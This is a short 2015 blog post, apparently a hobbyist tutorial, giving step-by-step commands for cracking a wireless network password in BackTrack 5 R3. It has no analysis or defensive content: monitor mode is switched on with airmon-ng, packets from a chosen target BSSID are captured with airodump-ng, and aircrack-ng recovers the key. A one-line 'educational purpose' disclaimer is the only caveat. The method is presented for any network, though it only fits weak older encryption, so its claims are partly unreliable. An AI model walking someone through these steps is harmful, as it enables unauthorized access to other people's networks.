Monday, March 16, 2015

Backtrack 5 R3 Tutorial of Hacking WLAN password By King Jimmy



            Backtrack 5 R3 Tutorial of Hacking WLAN password By King Jimmy

  1. In Backtrack, Open new terminal and type "ifconfig". (You will get the network interfaces there. And check whether the wlan is there. Example, "wlan0")
  2. Than type "ifconfig wlan0 up". There might be different name in network interface.
  3. After wlan0 is up, enter "airmon-ng start wlan0". (This will enable monitor mode. Also it will display the name. Example, mon1 or mon2 etc.)
  4. Than enter "airodump-ng mon2". ("mon2" could be different in yours.)
    Wait until you get the information of wlan networks. And press Ctrl+c on your keyboard.
  5. Than in same terminal type " airodump-ng mon2 --bssid 00:30:4F:8D:4C:66 -c 1 -w anYtube". (Bssid and channel might be not same. You will get bssid and channel in step 4, enter that bssid  and channel when you doing this. I got "00:30:4F:8D:4C:66" as bssid and "1" as channel. So you have to enter your target network's bssid and channel.)
  6. When you done step 5 correctly it will start collecting packets. Wait until the data reaches 20000 and press Ctrl+c. (Now the data file is saved on home folder)
  7. In terminal type "aircrack-ng anYtube-01.cap" and hit enter. This take a while...
Now you should get the wlan password. Example, (ASCII: 12345)
Finally you got the password!
=This is for educational purpose. Do not use illegally.=

Thank You For Spending Your Valuable Time Surfing My Website.

No comments:

Post a Comment